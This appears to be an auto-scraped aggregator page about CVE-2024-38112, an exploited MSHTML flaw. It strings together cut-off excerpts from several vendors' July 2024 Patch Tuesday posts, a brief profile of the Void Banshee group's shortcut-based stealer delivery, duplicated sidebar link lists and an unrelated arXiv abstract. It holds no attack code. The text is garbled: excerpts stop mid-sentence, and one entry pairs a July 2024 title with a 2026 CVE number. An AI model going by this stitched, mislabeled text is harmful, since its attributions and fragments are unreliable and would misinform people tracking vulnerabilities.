Threat Research 174
Web 3.0 Security 11
Wipers 0
## Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
by Haifei Li
## Introduction and Background
Check Point R
Trendmicro
The July 2024 Security Update Review
blogs_trendmicro·2024-07-09
The July 2024 Security Update Review
# The July 2024 Security Update Review
Get the July 2024 security update and review.
By: Dustin Childs
2024/07/09
Read time: ( words)
Save to Folio
We’re just past the halfway point of 2024, and as expected, Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:
Adobe Patches for July 2024
For July, Adobe released three patches addressing seven CVEs in Adobe Premiere Pro, InDesign, and Adobe Bridge. The patch for InDesign is the largest, fixing four Critical-rated CVEs. All four could lead to arbitrary code execution. The fix for Premiere Pro fixes a single CVE
Qualys
Microsoft and Adobe July 2024 Security Patches Explained | Qualys
blogs_qualys·2024-07-09
Microsoft and Adobe July 2024 Security Patches Explained | Qualys
#### Table of Contents
- Microsoft Patch Tuesday for July 2024
- Adobe Patches for July 2024
- Zero-day Vulnerabilities Patched in July Patch Tuesday Edition
- Critical Severity Vulnerabilities Patched in July Patch Tuesday Edition
- Other Microsoft Vulnerability Highlights
- Microsoft Release Summary
- Discover and Prioritize Vulnerabilities inVulnerability Management, Detection & Response (VMDR)
- Rapid Response withPatch Management (PM)
- EVALUATE Vendor-Suggested Mitigation with Policy Compliance (PC)
- Qualys Monthly Webinar Series
July’s Patch Tuesday brings a midsummer wave of updates, addressing critical vulnerabilities and enhancing security across the Microsoft ecosystem. Let’s discover the highlights from Microsoft’s Patch Tuesday updates for July 2024.
## Microsoft Patch Tue
Krebs
Microsoft Patch Tuesday, July 2024 Edition
blogs_krebs·2024-07-09·CVSS 9.8
CVE-2024-38080 [CRITICAL] Microsoft Patch Tuesday, July 2024 Edition
Microsoft Corp. today issued software updates to plug at least 139 security holes in various flavors of Windows and other Microsoft products. Redmond says attackers are already exploiting at least two of the vulnerabilities in active attacks against Windows users.
The first Microsoft zero-day this month is CVE-2024-38080, a bug in the Windows Hyper-V component that affects Windows 11 and Windows Server 2022 systems. CVE-2024-38080 allows an attacker to increase their account privileges on a Windows machine. Although Microsoft says this flaw is being exploited, it has offered scant details about its exploitation.
The other zero-day is CVE-2024-38112, which is a weakness in MSHTML, the proprietary engine of Microsoft’s Internet Explorer web browser. Kevin Breen, senior director of threat r
Threat Intel
Void Banshee
threat_intel·CVSS 7.5
CVE-2024-38112 [HIGH] Void Banshee
# Threat Actor: Void Banshee
## Description
Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.
Crowdstrike
July 2024 Patch Tuesday: Updates and Analysis
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] July 2024 Patch Tuesday: Updates and Analysis
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How Charlotte AI AgentWorks Fuels Security's Agentic Ecosystem Mar 25, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand ATT&CK in 10 Minutes or Less [VI
Crowdstrike
July 2024 Patch Tuesday: Updates and Analysis
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] July 2024 Patch Tuesday: Updates and Analysis
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
How CrowdStrike is Accelerating Exposure Evaluation as Adversaries Gain Speed Apr 06, 2026
STARDUST CHOLLIMA Likely Compromises Axios npm Package Apr 01, 2026
Falcon for IT Supports Windows Secure Boot Certificate Lifecycle Management Apr 01, 2026
Detecting CVE-2026-20929: Kerberos Authentication Relay via CNAME Abuse Mar 31, 2026
Video Highlights the 4 Key Steps to Successful Incident Response Dec 02, 2019
Helping Non-Security Stakeholders Understand AT
arXiv
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
arxiv_fulltext·2025-04-01
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
LLM-Assisted Proactive Threat Intelligence for Automated Reasoning
Shuva Paul, Member, IEEE,
Farhad Alemi, Student Member, IEEE,
and Richard Macwan, Member, IEEE
Farhad Alemi is a graduate researcher at Arizona State University.
Shuva Paul and Richard Macwan are researchers at the National Renewable Energy Laboratory, Golden, CO
Journal of \ Class Files, Vol. 14, No. 8, August 2015
Shell et al.: Bare Demo of IEEEtran.cls for IEEE Journals
## Abstract
Successful defense against dynamically evolving cyber threats requires advanced and sophisticated techniques. This research presents a novel approach to enhance real-time cybersecurity threat detection and response by integrating large language models (LLMs) and Retrieval-Augmented Generation (RAG) systems with continuous threat intelligen
2024-07-09
Published
2024-07-09
Added to CISA KEV
Exploited in the wild